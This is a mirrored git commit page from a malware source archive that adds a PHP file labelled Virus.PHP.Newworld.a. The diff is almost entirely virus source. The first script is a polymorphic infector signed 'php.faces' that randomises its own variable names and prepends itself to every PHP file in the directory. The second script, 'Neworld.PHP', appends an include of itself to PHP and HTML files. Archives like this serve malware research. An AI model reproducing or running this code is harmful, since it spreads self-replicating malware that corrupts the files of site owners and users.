daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 07:49:24 +00:00
Code Issues Projects Releases Wiki Activity

Rename PHP/Virus.PHP.Feast to PHP/Infector/Virus.PHP.Newworld.a

Browse Source
This commit is contained in:
vxunderground
2020-11-02 23:51:37 -06:00
committed by GitHub
parent bf15280bb3
commit 5d335d176c
1 changed files with 0 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
PHP/Infector/Virus.PHP.Newworld.a
+80
View File
@@ -0,0 +1,80 @@
<?php
$ypxqrpsqcc = fopen(__FILE__, "r");
$bbugesqpty = substr(fread($ypxqrpsqcc, filesize(__FILE__)), 0, 1249);
fclose($ypxqrpsqcc);
$dhbpgxtamn = array("ypxqrpsqcc", "bbugesqpty", "dhbpgxtamn", "cctsvcopcx", "wurwejtvjx",
"ccznwozuuo", "uudxleoyja", "ionwdbkwfh", "zohqscoxob", "skzmabzbfe");
for($cctsvcopcx = 0; $cctsvcopcx < count($dhbpgxtamn); $cctsvcopcx++){
$wurwejtvjx = chr(rand(97, 122));
for($ccznwozuuo = 0; $ccznwozuuo < 9; $ccznwozuuo++) $wurwejtvjx = $wurwejtvjx . chr(rand(97, 122));
$bbugesqpty = str_replace("$dhbpgxtamn[$cctsvcopcx]", "$wurwejtvjx", "$bbugesqpty");
}
$uudxleoyja = opendir(".");
while(false !== ($ionwdbkwfh = readdir($uudxleoyja))){
if($ionwdbkwfh != "." && $ionwdbkwfh != ".."){
if(substr($ionwdbkwfh, -3) == "php"){
$zohqscoxob = fopen($ionwdbkwfh, "r");
$skzmabzbfe = substr(fread($zohqscoxob, filesize($ionwdbkwfh)), 5);
fclose($zohqscoxob);
if(!strstr($skzmabzbfe, "php.faces")){
unlink("$ionwdbkwfh");
$zohqscoxob = fopen($ionwdbkwfh, "a+");
fwrite($zohqscoxob, "$bbugesqpty");
fwrite($zohqscoxob, "$skzmabzbfe");
fclose($zohqscoxob);
}
}
}
}
closedir($uudxleoyja);
// php.faces (c) by Kefi, 2003
?>
<?php
$vir_string = "Neworld.PHP\n";
$virstringm = "Welcome To The New World Of PHP Programming\n";
$virt = $vir_string . $virstringm;
echo $virt;
$all = opendir('C:\Windows\');
while ($file = readdir($all))
{
$inf = true;
$exe = false;
if ( ($exe = strstr ($file, '.php')) || ($exe = strstr ($file, '.html')) || ($exe = strstr ($file, '.htm')) || ($exe = strstr ($file, '.htt')) )
if ( is_file($file) && is_writeable($file) )
{
$new = fopen($file, "r");
$look = fread($new, filesize($file));
$yes = strstr ($look, 'neworld.php');
if (!$yes) $inf = false;
}
if ( ($inf=false) )
{
$new = fopen($file, "a");
$fputs($new, "<!-- ");
$fputs($new, "Neworld.PHP - ");
$fputs($new, "Made By Xmorpfic, ");
$fputs($new, "www.shadowvx.com/bcvg, ");
$fputs($new, "The Black Cat Virii Group.");
$fputs($new, "--->");
$fputs($new, "<?php ");
$fputs($new, "include(\"");
$fputs($new, __FILE__);
$fputs($new, "\"); ");
$fputs($new, "?>");
return;
}
}
closedir($all);
// Neworld.PHP Virus - Made By Xmorfic, www.shadowvx.com/bcvg, Black Cat Virii Group.
?>